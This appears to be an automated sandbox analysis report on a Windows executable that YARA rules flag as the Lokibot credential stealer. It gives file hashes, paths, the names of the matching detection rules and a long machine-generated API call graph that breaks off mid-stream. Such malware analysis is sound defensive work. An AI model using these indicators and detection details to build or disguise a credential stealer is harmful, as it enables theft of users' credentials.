                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Has exited:true

                                                              Target ID:38
                                                              Start time:05:02:32
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:39
                                                              Start time:05:02:33
                                                              Start date:07/01/2025
                                                              Path:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
                                                              Imagebase:0x30000
                                                              File size:1'176'576 bytes
                                                              MD5 hash:6D9798801523EE1C8C5DC83D28346814
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:2.4%
                                                                Dynamic/Decrypted Code Coverage:1.1%
                                                                Signature Coverage:3.6%
                                                                Total number of Nodes:1603
                                                                Total number of Limit Nodes:30
                                                                execution_graph 95437 711033 95442 714c91 95437->95442 95441 711042 95451 71a961 95442->95451 95446 753cb6 95448 714d9c 95448->95446 95449 711038 95448->95449 95459 7151f7 22 API calls __fread_nolock 95448->95459 95450 7300a3 29 API calls __onexit 95449->95450 95450->95441 95460 72fe0b 95451->95460 95453 71a976 95470 72fddb 95453->95470 95455 714cff 95456 713af0 95455->95456 95495 713b1c 95456->95495 95459->95448 95464 72fddb 95460->95464 95462 72fdfa 95462->95453 95464->95462 95466 72fdfc 95464->95466 95480 73ea0c 95464->95480 95487 734ead 7 API calls 2 library calls 95464->95487 95465 73066d 95489 7332a4 RaiseException 95465->95489 95466->95465 95488 7332a4 RaiseException 95466->95488 95469 73068a 95469->95453 95472 72fde0 95470->95472 95471 73ea0c ___std_exception_copy 21 API calls 95471->95472 95472->95471 95473 72fdfa 95472->95473 95475 72fdfc 95472->95475 95492 734ead 7 API calls 2 library calls 95472->95492 95473->95455 95479 73066d 95475->95479 95493 7332a4 RaiseException 95475->95493 95478 73068a 95478->95455 95494 7332a4 RaiseException 95479->95494 95485 743820 __dosmaperr 95480->95485 95481 74385e 95491 73f2d9 20 API calls __dosmaperr 95481->95491 95483 743849 RtlAllocateHeap 95484 74385c 95483->95484 95483->95485 95484->95464 95485->95481 95485->95483 95490 734ead 7 API calls 2 library calls 95485->95490 95487->95464 95488->95465 95489->95469 95490->95485 95491->95484 95492->95472 95493->95479 95494->95478 95496 713b0f 95495->95496 95497 713b29 95495->95497 95496->95448 95497->95496 95498 713b30 RegOpenKeyExW 95497->95498 95498->95496 95499 713b4a RegQueryValueExW 95498->95499 95500 713b80 RegCloseKey 95499->95500 95501 713b6b 95499->95501 95500->95496 95501->95500 95502 712e37 95503 71a961 22 API calls 95502->95503 95504 712e4d 95503->95504 95581 714ae3 95504->95581 95506 712e6b 95595 713a5a 95506->95595 95508 712e7f 95602 719cb3 95508->95602 95513 752cb0 95650 782cf9 95513->95650 95514 712ead 95630 71a8c7 95514->95630 95516 752cc3 95517 752ccf 95516->95517 95676 714f39 95516->95676 95522 714f39 68 API calls 95517->95522 95520 712ec3 95634 716f88 22 API calls 95520->95634 95525 752ce5 95522->95525 95523 712ecf 95524 719cb3 22 API calls 95523->95524 95526 712edc 95524->95526 95682 713084 22 API calls 95525->95682 95635 71a81b 41 API calls 95526->95635 95528 712eec 95531 719cb3 22 API calls 95528->95531 95530 752d02 95683 713084 22 API calls 95530->95683 95533 712f12 95531->95533 95636 71a81b 41 API calls 95533->95636 95534 752d1e 95536 713a5a 24 API calls 95534->95536 95537 752d44 95536->95537 95684 713084 22 API calls 95537->95684 95538 712f21 95541 71a961 22 API calls 95538->95541 95540 752d50 95542 71a8c7 22 API calls 95540->95542 95543 712f3f 95541->95543 95545 752d5e 95542->95545 95637 713084 22 API calls 95543->95637 95685 713084 22 API calls 95545->95685 95546 712f4b 95638 734a28 40 API calls 3 library calls 95546->95638 95549 752d6d 95552 71a8c7 22 API calls 95549->95552 95550 712f59 95550->95525 95551 712f63 95550->95551 95639 734a28 40 API calls 3 library calls 95551->95639 95554 752d83 95552->95554 95686 713084 22 API calls 95554->95686 95555 712f6e 95555->95530 95557 712f78 95555->95557 95640 734a28 40 API calls 3 library calls 95557->95640 95558 752d90 95560 712f83 95560->95534 95561 712f8d 95560->95561 95641 734a28 40 API calls 3 library calls 95561->95641 95563 712f98 95564 712fdc 95563->95564 95642 713084 22 API calls 95563->95642 95564->95549 95565 712fe8 95564->95565 95565->95558 95644 7163eb 22 API calls 95565->95644 95567 712fbf 95569 71a8c7 22 API calls 95567->95569 95571 712fcd 95569->95571 95570 712ff8 95645 716a50 22 API calls 95570->95645 95643 713084 22 API calls 95571->95643 95574 713006 95646 7170b0 23 API calls 95574->95646 95578 713021 95579 713065 95578->95579 95647 716f88 22 API calls 95578->95647 95648 7170b0 23 API calls 95578->95648 95649 713084 22 API calls 95578->95649 95582 714af0 __wsopen_s 95581->95582 95584 714b22 95582->95584 95690 716b57 95582->95690 95594 714b58 95584->95594 95687 714c6d 95584->95687 95586 719cb3 22 API calls 95587 714c52 95586->95587 95589 71515f 22 API calls 95587->95589 95588 719cb3 22 API calls 95588->95594 95592 714c5e 95589->95592 95590 714c6d 22 API calls 95590->95594 95592->95506 95593 714c29 95593->95586 95593->95592 95594->95588 95594->95590 95594->95593 95702 71515f 95594->95702 95719 751f50 95595->95719 95598 719cb3 22 API calls 95599 713a8d 95598->95599 95721 713aa2 95599->95721 95601 713a97 95601->95508 95603 719cc2 _wcslen 95602->95603 95604 72fe0b 22 API calls 95603->95604 95605 719cea __fread_nolock 95604->95605 95606 72fddb 22 API calls 95605->95606 95607 712e8c 95606->95607 95608 714ecb 95607->95608 95741 714e90 LoadLibraryA 95608->95741 95613 714ef6 LoadLibraryExW 95749 714e59 LoadLibraryA 95613->95749 95614 753ccf 95615 714f39 68 API calls 95614->95615 95617 753cd6 95615->95617 95619 714e59 3 API calls 95617->95619 95622 753cde 95619->95622 95621 714f20 95621->95622 95623 714f2c 95621->95623 95771 7150f5 95622->95771 95624 714f39 68 API calls 95623->95624 95626 712ea5 95624->95626 95626->95513 95626->95514 95629 753d05 95631 71a8ea __fread_nolock 95630->95631 95632 71a8db 95630->95632 95631->95520 95632->95631 95633 72fe0b 22 API calls 95632->95633 95633->95631 95634->95523 95635->95528 95636->95538 95637->95546 95638->95550 95639->95555 95640->95560 95641->95563 95642->95567 95643->95564 95644->95570 95645->95574 95646->95578 95647->95578 95648->95578 95649->95578 95651 782d15 95650->95651 95652 71511f 64 API calls 95651->95652 95653 782d29 95652->95653 95921 782e66 95653->95921 95656 7150f5 40 API calls 95657 782d56 95656->95657 95658 7150f5 40 API calls 95657->95658 95659 782d66 95658->95659 95660 7150f5 40 API calls 95659->95660 95661 782d81 95660->95661 95662 7150f5 40 API calls 95661->95662 95663 782d9c 95662->95663 95664 71511f 64 API calls 95663->95664 95665 782db3 95664->95665 95666 73ea0c ___std_exception_copy 21 API calls 95665->95666 95667 782dba 95666->95667 95668 73ea0c ___std_exception_copy 21 API calls 95667->95668 95669 782dc4 95668->95669 95670 7150f5 40 API calls 95669->95670 95671 782dd8 95670->95671 95672 7828fe 27 API calls 95671->95672 95673 782dee 95672->95673 95674 782d3f 95673->95674 95927 7822ce 79 API calls 95673->95927 95674->95516 95677 714f43 95676->95677 95679 714f4a 95676->95679 95928 73e678 95677->95928 95680 714f59 95679->95680 95681 714f6a FreeLibrary 95679->95681 95680->95517 95681->95680 95682->95530 95683->95534 95684->95540 95685->95549 95686->95558 95708 71aec9 95687->95708 95689 714c78 95689->95584 95691 754ba1 95690->95691 95692 716b67 _wcslen 95690->95692 95715 7193b2 95691->95715 95695 716ba2 95692->95695 95696 716b7d 95692->95696 95694 754baa 95694->95694 95697 72fddb 22 API calls 95695->95697 95714 716f34 22 API calls 95696->95714 95699 716bae 95697->95699 95701 72fe0b 22 API calls 95699->95701 95700 716b85 __fread_nolock 95700->95584 95701->95700 95703 71516e 95702->95703 95707 71518f __fread_nolock 95702->95707 95705 72fe0b 22 API calls 95703->95705 95704 72fddb 22 API calls 95706 7151a2 95704->95706 95705->95707 95706->95594 95707->95704 95709 71aed9 __fread_nolock 95708->95709 95710 71aedc 95708->95710 95709->95689 95711 72fddb 22 API calls 95710->95711 95712 71aee7 95711->95712 95713 72fe0b 22 API calls 95712->95713 95713->95709 95714->95700 95716 7193c0 95715->95716 95717 7193c9 __fread_nolock 95715->95717 95716->95717 95718 71aec9 22 API calls 95716->95718 95717->95694 95717->95717 95718->95717 95720 713a67 GetModuleFileNameW 95719->95720 95720->95598 95722 751f50 __wsopen_s 95721->95722 95723 713aaf GetFullPathNameW 95722->95723 95724 713ae9 95723->95724 95725 713ace 95723->95725 95735 71a6c3 95724->95735 95727 716b57 22 API calls 95725->95727 95728 713ada 95727->95728 95731 7137a0 95728->95731 95732 7137ae 95731->95732 95733 7193b2 22 API calls 95732->95733 95734 7137c2 95733->95734 95734->95601 95736 71a6d0 95735->95736 95737 71a6dd 95735->95737 95736->95728 95738 72fddb 22 API calls 95737->95738 95739 71a6e7 95738->95739 95740 72fe0b 22 API calls 95739->95740 95740->95736 95742 714ec6 95741->95742 95743 714ea8 GetProcAddress 95741->95743 95746 73e5eb 95742->95746 95744 714eb8 95743->95744 95744->95742 95745 714ebf FreeLibrary 95744->95745 95745->95742 95779 73e52a 95746->95779 95748 714eea 95748->95613 95748->95614 95750 714e8d 95749->95750 95751 714e6e GetProcAddress 95749->95751 95754 714f80 95750->95754 95752 714e7e 95751->95752 95752->95750 95753 714e86 FreeLibrary 95752->95753 95753->95750 95755 72fe0b 22 API calls 95754->95755 95756 714f95 95755->95756 95847 715722 95756->95847 95758 714fa1 __fread_nolock 95759 714fdc 95758->95759 95760 7150a5 95758->95760 95761 753d1d 95758->95761 95764 753d22 95759->95764 95765 7150f5 40 API calls 95759->95765 95770 71506e messages 95759->95770 95856 71511f 95759->95856 95850 7142a2 CreateStreamOnHGlobal 95760->95850 95861 78304d 74 API calls 95761->95861 95766 71511f 64 API calls 95764->95766 95765->95759 95767 753d45 95766->95767 95768 7150f5 40 API calls 95767->95768 95768->95770 95770->95621 95772 753d70 95771->95772 95773 715107 95771->95773 95883 73e8c4 95773->95883 95776 7828fe 95904 78274e 95776->95904 95778 782919 95778->95629 95782 73e536 CallCatchBlock 95779->95782 95780 73e544 95804 73f2d9 20 API calls __dosmaperr 95780->95804 95782->95780 95784 73e574 95782->95784 95783 73e549 95805 7427ec 26 API calls __wsopen_s 95783->95805 95786 73e586 95784->95786 95787 73e579 95784->95787 95796 748061 95786->95796 95806 73f2d9 20 API calls __dosmaperr 95787->95806 95790 73e58f 95791 73e5a2 95790->95791 95792 73e595 95790->95792 95808 73e5d4 LeaveCriticalSection __fread_nolock 95791->95808 95807 73f2d9 20 API calls __dosmaperr 95792->95807 95794 73e554 __wsopen_s 95794->95748 95797 74806d CallCatchBlock 95796->95797 95809 742f5e EnterCriticalSection 95797->95809 95799 74807b 95810 7480fb 95799->95810 95803 7480ac __wsopen_s 95803->95790 95804->95783 95805->95794 95806->95794 95807->95794 95808->95794 95809->95799 95811 74811e 95810->95811 95812 748177 95811->95812 95819 748088 95811->95819 95826 73918d EnterCriticalSection 95811->95826 95827 7391a1 LeaveCriticalSection 95811->95827 95828 744c7d 95812->95828 95817 748189 95817->95819 95841 743405 11 API calls 2 library calls 95817->95841 95823 7480b7 95819->95823 95820 7481a8 95842 73918d EnterCriticalSection 95820->95842 95846 742fa6 LeaveCriticalSection 95823->95846 95825 7480be 95825->95803 95826->95811 95827->95811 95833 744c8a __dosmaperr 95828->95833 95829 744cca 95844 73f2d9 20 API calls __dosmaperr 95829->95844 95830 744cb5 RtlAllocateHeap 95831 744cc8 95830->95831 95830->95833 95835 7429c8 95831->95835 95833->95829 95833->95830 95843 734ead 7 API calls 2 library calls 95833->95843 95836 7429fc __dosmaperr 95835->95836 95837 7429d3 RtlFreeHeap 95835->95837 95836->95817 95837->95836 95838 7429e8 95837->95838 95845 73f2d9 20 API calls __dosmaperr 95838->95845 95840 7429ee GetLastError 95840->95836 95841->95820 95842->95819 95843->95833 95844->95831 95845->95840 95846->95825 95848 72fddb 22 API calls 95847->95848 95849 715734 95848->95849 95849->95758 95851 7142d9 95850->95851 95852 7142bc FindResourceExW 95850->95852 95851->95759 95852->95851 95853 7535ba LoadResource 95852->95853 95853->95851 95854 7535cf SizeofResource 95853->95854 95854->95851 95855 7535e3 LockResource 95854->95855 95855->95851 95857 71512e 95856->95857 95860 753d90 95856->95860 95862 73ece3 95857->95862 95861->95764 95865 73eaaa 95862->95865 95864 71513c 95864->95759 95868 73eab6 CallCatchBlock 95865->95868 95866 73eac2 95878 73f2d9 20 API calls __dosmaperr 95866->95878 95867 73eae8 95880 73918d EnterCriticalSection 95867->95880 95868->95866 95868->95867 95871 73eac7 95879 7427ec 26 API calls __wsopen_s 95871->95879 95872 73eaf4 95881 73ec0a 62 API calls 2 library calls 95872->95881 95875 73eb08 95882 73eb27 LeaveCriticalSection __fread_nolock 95875->95882 95877 73ead2 __wsopen_s 95877->95864 95878->95871 95879->95877 95880->95872 95881->95875 95882->95877 95886 73e8e1 95883->95886 95885 715118 95885->95776 95887 73e8ed CallCatchBlock 95886->95887 95888 73e900 ___scrt_fastfail 95887->95888 95889 73e92d 95887->95889 95890 73e925 __wsopen_s 95887->95890 95899 73f2d9 20 API calls __dosmaperr 95888->95899 95901 73918d EnterCriticalSection 95889->95901 95890->95885 95893 73e937 95902 73e6f8 38 API calls 4 library calls 95893->95902 95894 73e91a 95900 7427ec 26 API calls __wsopen_s 95894->95900 95897 73e94e 95903 73e96c LeaveCriticalSection __fread_nolock 95897->95903 95899->95894 95900->95890 95901->95893 95902->95897 95903->95890 95907 73e4e8 95904->95907 95906 78275d 95906->95778 95910 73e469 95907->95910 95909 73e505 95909->95906 95911 73e478 95910->95911 95912 73e48c 95910->95912 95918 73f2d9 20 API calls __dosmaperr 95911->95918 95917 73e488 __alldvrm 95912->95917 95920 74333f 11 API calls 2 library calls 95912->95920 95914 73e47d 95919 7427ec 26 API calls __wsopen_s 95914->95919 95917->95909 95918->95914 95919->95917 95920->95917 95922 782e7a 95921->95922 95923 7150f5 40 API calls 95922->95923 95924 782d3b 95922->95924 95925 7828fe 27 API calls 95922->95925 95926 71511f 64 API calls 95922->95926 95923->95922 95924->95656 95924->95674 95925->95922 95926->95922 95927->95674 95929 73e684 CallCatchBlock 95928->95929 95930 73e695 95929->95930 95931 73e6aa 95929->95931 95958 73f2d9 20 API calls __dosmaperr 95930->95958 95939 73e6a5 __wsopen_s 95931->95939 95941 73918d EnterCriticalSection 95931->95941 95933 73e69a 95959 7427ec 26 API calls __wsopen_s 95933->95959 95936 73e6c6 95942 73e602 95936->95942 95938 73e6d1 95960 73e6ee LeaveCriticalSection __fread_nolock 95938->95960 95939->95679 95941->95936 95943 73e60f 95942->95943 95945 73e624 95942->95945 95993 73f2d9 20 API calls __dosmaperr 95943->95993 95951 73e61f 95945->95951 95961 73dc0b 95945->95961 95946 73e614 95994 7427ec 26 API calls __wsopen_s 95946->95994 95951->95938 95954 73e646 95978 74862f 95954->95978 95957 7429c8 _free 20 API calls 95957->95951 95958->95933 95959->95939 95960->95939 95962 73dc23 95961->95962 95963 73dc1f 95961->95963 95962->95963 95964 73d955 __fread_nolock 26 API calls 95962->95964 95967 744d7a 95963->95967 95965 73dc43 95964->95965 95995 7459be 62 API calls 3 library calls 95965->95995 95968 73e640 95967->95968 95969 744d90 95967->95969 95971 73d955 95968->95971 95969->95968 95970 7429c8 _free 20 API calls 95969->95970 95970->95968 95972 73d961 95971->95972 95973 73d976 95971->95973 95996 73f2d9 20 API calls __dosmaperr 95972->95996 95973->95954 95975 73d966 95997 7427ec 26 API calls __wsopen_s 95975->95997 95977 73d971 95977->95954 95979 748653 95978->95979 95980 74863e 95978->95980 95981 74868e 95979->95981 95986 74867a 95979->95986 96001 73f2c6 20 API calls __dosmaperr 95980->96001 96003 73f2c6 20 API calls __dosmaperr 95981->96003 95983 748643 96002 73f2d9 20 API calls __dosmaperr 95983->96002 95998 748607 95986->95998 95987 748693 96004 73f2d9 20 API calls __dosmaperr 95987->96004 95990 73e64c 95990->95951 95990->95957 95991 74869b 96005 7427ec 26 API calls __wsopen_s 95991->96005 95993->95946 95994->95951 95995->95963 95996->95975 95997->95977 96006 748585 95998->96006 96000 74862b 96000->95990 96001->95983 96002->95990 96003->95987 96004->95991 96005->95990 96007 748591 CallCatchBlock 96006->96007 96017 745147 EnterCriticalSection 96007->96017 96009 74859f 96010 7485c6 96009->96010 96011 7485d1 96009->96011 96018 7486ae 96010->96018 96033 73f2d9 20 API calls __dosmaperr 96011->96033 96014 7485cc 96034 7485fb LeaveCriticalSection __wsopen_s 96014->96034 96016 7485ee __wsopen_s 96016->96000 96017->96009 96035 7453c4 96018->96035 96020 7486be 96021 7486c4 96020->96021 96023 7486f6 96020->96023 96024 7453c4 __wsopen_s 26 API calls 96020->96024 96048 745333 21 API calls 2 library calls 96021->96048 96023->96021 96025 7453c4 __wsopen_s 26 API calls 96023->96025 96027 7486ed 96024->96027 96028 748702 CloseHandle 96025->96028 96026 74871c 96029 74873e 96026->96029 96049 73f2a3 20 API calls __dosmaperr 96026->96049 96030 7453c4 __wsopen_s 26 API calls 96027->96030 96028->96021 96031 74870e GetLastError 96028->96031 96029->96014 96030->96023 96031->96021 96033->96014 96034->96016 96036 7453e6 96035->96036 96037 7453d1 96035->96037 96041 74540b 96036->96041 96052 73f2c6 20 API calls __dosmaperr 96036->96052 96050 73f2c6 20 API calls __dosmaperr 96037->96050 96040 7453d6 96051 73f2d9 20 API calls __dosmaperr 96040->96051 96041->96020 96042 745416 96053 73f2d9 20 API calls __dosmaperr 96042->96053 96045 7453de 96045->96020 96046 74541e 96054 7427ec 26 API calls __wsopen_s 96046->96054 96048->96026 96049->96029 96050->96040 96051->96045 96052->96042 96053->96046 96054->96045 96055 713156 96058 713170 96055->96058 96059 713187 96058->96059 96060 7131e9 96059->96060 96061 7131eb 96059->96061 96062 71318c 96059->96062 96063 7131d0 DefWindowProcW 96060->96063 96064 7131f1 96061->96064 96065 752dfb 96061->96065 96066 713265 PostQuitMessage 96062->96066 96067 713199 96062->96067 96068 71316a 96063->96068 96069 7131f8 96064->96069 96070 71321d SetTimer RegisterWindowMessageW 96064->96070 96107 7118e2 10 API calls 96065->96107 96066->96068 96072 7131a4 96067->96072 96073 752e7c 96067->96073 96074 713201 KillTimer 96069->96074 96075 752d9c 96069->96075 96070->96068 96077 713246 CreatePopupMenu 96070->96077 96078 752e68 96072->96078 96079 7131ae 96072->96079 96122 77bf30 34 API calls ___scrt_fastfail 96073->96122 96103 7130f2 Shell_NotifyIconW ___scrt_fastfail 96074->96103 96081 752dd7 MoveWindow 96075->96081 96082 752da1 96075->96082 96076 752e1c 96108 72e499 42 API calls 96076->96108 96077->96068 96121 77c161 27 API calls ___scrt_fastfail 96078->96121 96086 752e4d 96079->96086 96087 7131b9 96079->96087 96081->96068 96089 752da7 96082->96089 96090 752dc6 SetFocus 96082->96090 96086->96063 96120 770ad7 22 API calls 96086->96120 96093 7131c4 96087->96093 96094 713253 96087->96094 96088 752e8e 96088->96063 96088->96068 96089->96093 96095 752db0 96089->96095 96090->96068 96091 713214 96104 713c50 DeleteObject DestroyWindow 96091->96104 96092 713263 96092->96068 96093->96063 96109 7130f2 Shell_NotifyIconW ___scrt_fastfail 96093->96109 96105 71326f 44 API calls ___scrt_fastfail 96094->96105 96106 7118e2 10 API calls 96095->96106 96101 752e41 96110 713837 96101->96110 96103->96091 96104->96068 96105->96092 96106->96068 96107->96076 96108->96093 96109->96101 96111 713862 ___scrt_fastfail 96110->96111 96123 714212 96111->96123 96114 7138e8 96116 753386 Shell_NotifyIconW 96114->96116 96117 713906 Shell_NotifyIconW 96114->96117 96127 713923 96117->96127 96119 71391c 96119->96060 96120->96060 96121->96092 96122->96088 96124 7535a4 96123->96124 96125 7138b7 96123->96125 96124->96125 96126 7535ad DestroyIcon 96124->96126 96125->96114 96149 77c874 42 API calls _strftime 96125->96149 96126->96125 96128 71393f 96127->96128 96147 713a13 96127->96147 96150 716270 96128->96150 96131 753393 LoadStringW 96134 7533ad 96131->96134 96132 71395a 96133 716b57 22 API calls 96132->96133 96135 71396f 96133->96135 96138 71a8c7 22 API calls 96134->96138 96143 713994 ___scrt_fastfail 96134->96143 96136 7533c9 96135->96136 96137 71397c 96135->96137 96140 716350 22 API calls 96136->96140 96137->96134 96139 713986 96137->96139 96138->96143 96155 716350 96139->96155 96142 7533d7 96140->96142 96142->96143 96164 7133c6 96142->96164 96145 7139f9 Shell_NotifyIconW 96143->96145 96145->96147 96146 7533f9 96148 7133c6 22 API calls 96146->96148 96147->96119 96148->96143 96149->96114 96151 72fe0b 22 API calls 96150->96151 96152 716295 96151->96152 96153 72fddb 22 API calls 96152->96153 96154 71394d 96153->96154 96154->96131 96154->96132 96156 716362 96155->96156 96157 754a51 96155->96157 96173 716373 96156->96173 96183 714a88 22 API calls __fread_nolock 96157->96183 96160 71636e 96160->96143 96161 754a5b 96162 754a67 96161->96162 96163 71a8c7 22 API calls 96161->96163 96163->96162 96165 7133dd 96164->96165 96166 7530bb 96164->96166 96189 7133ee 96165->96189 96168 72fddb 22 API calls 96166->96168 96170 7530c5 _wcslen 96168->96170 96169 7133e8 96169->96146 96171 72fe0b 22 API calls 96170->96171 96172 7530fe __fread_nolock 96171->96172 96174 7163b6 __fread_nolock 96173->96174 96175 716382 96173->96175 96174->96160 96175->96174 96176 754a82 96175->96176 96177 7163a9 96175->96177 96178 72fddb 22 API calls 96176->96178 96184 71a587 96177->96184 96180 754a91 96178->96180 96181 72fe0b 22 API calls 96180->96181 96182 754ac5 __fread_nolock 96181->96182 96183->96161 96185 71a59d 96184->96185 96188 71a598 __fread_nolock 96184->96188 96186 72fe0b 22 API calls 96185->96186 96187 75f80f 96185->96187 96186->96188 96188->96174 96190 7133fe _wcslen 96189->96190 96191 713411 96190->96191 96192 75311d 96190->96192 96193 71a587 22 API calls 96191->96193 96194 72fddb 22 API calls 96192->96194 96195 71341e __fread_nolock 96193->96195 96196 753127 96194->96196 96195->96169 96197 72fe0b 22 API calls 96196->96197 96198 753157 __fread_nolock 96197->96198 96199 7303fb 96200 730407 CallCatchBlock 96199->96200 96228 72feb1 96200->96228 96202 73040e 96203 730561 96202->96203 96206 730438 96202->96206 96255 73083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96203->96255 96205 730568 96256 734e52 28 API calls _abort 96205->96256 96215 730477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96206->96215 96239 74247d 96206->96239 96208 73056e 96257 734e04 28 API calls _abort 96208->96257 96212 730576 96213 730457 96219 7304d8 96215->96219 96251 734e1a 38 API calls 3 library calls 96215->96251 96217 7304de 96220 7304f3 96217->96220 96247 730959 96219->96247 96252 730992 GetModuleHandleW 96220->96252 96222 7304fa 96222->96205 96223 7304fe 96222->96223 96224 730507 96223->96224 96253 734df5 28 API calls _abort 96223->96253 96254 730040 13 API calls 2 library calls 96224->96254 96227 73050f 96227->96213 96229 72feba 96228->96229 96258 730698 IsProcessorFeaturePresent 96229->96258 96231 72fec6 96259 732c94 10 API calls 3 library calls 96231->96259 96233 72fecb 96234 72fecf 96233->96234 96260 742317 96233->96260 96234->96202 96237 72fee6 96237->96202 96241 742494 96239->96241 96240 730a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 96242 730451 96240->96242 96241->96240 96242->96213 96243 742421 96242->96243 96246 742450 96243->96246 96244 730a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 96245 742479 96244->96245 96245->96215 96246->96244 96319 732340 96247->96319 96250 73097f 96250->96217 96251->96219 96252->96222 96253->96224 96254->96227 96255->96205 96256->96208 96257->96212 96258->96231 96259->96233 96264 74d1f6 96260->96264 96263 732cbd 8 API calls 3 library calls 96263->96234 96265 74d213 96264->96265 96266 74d20f 96264->96266 96265->96266 96270 744bfb 96265->96270 96282 730a8c 96266->96282 96268 72fed8 96268->96237 96268->96263 96271 744c07 CallCatchBlock 96270->96271 96289 742f5e EnterCriticalSection 96271->96289 96273 744c0e 96290 7450af 96273->96290 96275 744c1d 96276 744c2c 96275->96276 96303 744a8f 29 API calls 96275->96303 96305 744c48 LeaveCriticalSection _abort 96276->96305 96279 744c27 96304 744b45 GetStdHandle GetFileType 96279->96304 96281 744c3d __wsopen_s 96281->96265 96283 730a97 IsProcessorFeaturePresent 96282->96283 96284 730a95 96282->96284 96286 730c5d 96283->96286 96284->96268 96318 730c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96286->96318 96288 730d40 96288->96268 96289->96273 96291 7450bb CallCatchBlock 96290->96291 96292 7450df 96291->96292 96293 7450c8 96291->96293 96306 742f5e EnterCriticalSection 96292->96306 96314 73f2d9 20 API calls __dosmaperr 96293->96314 96296 7450cd 96315 7427ec 26 API calls __wsopen_s 96296->96315 96299 7450d7 __wsopen_s 96299->96275 96301 7450eb 96302 745117 96301->96302 96307 745000 96301->96307 96316 74513e LeaveCriticalSection _abort 96302->96316 96303->96279 96304->96276 96305->96281 96306->96301 96308 744c7d __dosmaperr 20 API calls 96307->96308 96310 745012 96308->96310 96309 74501f 96311 7429c8 _free 20 API calls 96309->96311 96310->96309 96317 743405 11 API calls 2 library calls 96310->96317 96313 745071 96311->96313 96313->96301 96314->96296 96315->96299 96316->96299 96317->96310 96318->96288 96320 73096c GetStartupInfoW 96319->96320 96320->96250 96321 711098 96326 7142de 96321->96326 96325 7110a7 96327 71a961 22 API calls 96326->96327 96328 7142f5 GetVersionExW 96327->96328 96329 716b57 22 API calls 96328->96329 96330 714342 96329->96330 96331 7193b2 22 API calls 96330->96331 96340 714378 96330->96340 96332 71436c 96331->96332 96334 7137a0 22 API calls 96332->96334 96333 71441b GetCurrentProcess IsWow64Process 96335 714437 96333->96335 96334->96340 96336 753824 GetSystemInfo 96335->96336 96337 71444f LoadLibraryA 96335->96337 96338 714460 GetProcAddress 96337->96338 96339 71449c GetSystemInfo 96337->96339 96338->96339 96342 714470 GetNativeSystemInfo 96338->96342 96343 714476 96339->96343 96340->96333 96341 7537df 96340->96341 96342->96343 96344 71109d 96343->96344 96345 71447a FreeLibrary 96343->96345 96346 7300a3 29 API calls __onexit 96344->96346 96345->96344 96346->96325 96347 71105b 96352 71344d 96347->96352 96349 71106a 96383 7300a3 29 API calls __onexit 96349->96383 96351 711074 96353 71345d __wsopen_s 96352->96353 96354 71a961 22 API calls 96353->96354 96355 713513 96354->96355 96356 713a5a 24 API calls 96355->96356 96357 71351c 96356->96357 96384 713357 96357->96384 96360 7133c6 22 API calls 96361 713535 96360->96361 96362 71515f 22 API calls 96361->96362 96363 713544 96362->96363 96364 71a961 22 API calls 96363->96364 96365 71354d 96364->96365 96366 71a6c3 22 API calls 96365->96366 96367 713556 RegOpenKeyExW 96366->96367 96368 753176 RegQueryValueExW 96367->96368 96373 713578 96367->96373 96369 753193 96368->96369 96370 75320c RegCloseKey 96368->96370 96371 72fe0b 22 API calls 96369->96371 96370->96373 96381 75321e _wcslen 96370->96381 96372 7531ac 96371->96372 96374 715722 22 API calls 96372->96374 96373->96349 96375 7531b7 RegQueryValueExW 96374->96375 96376 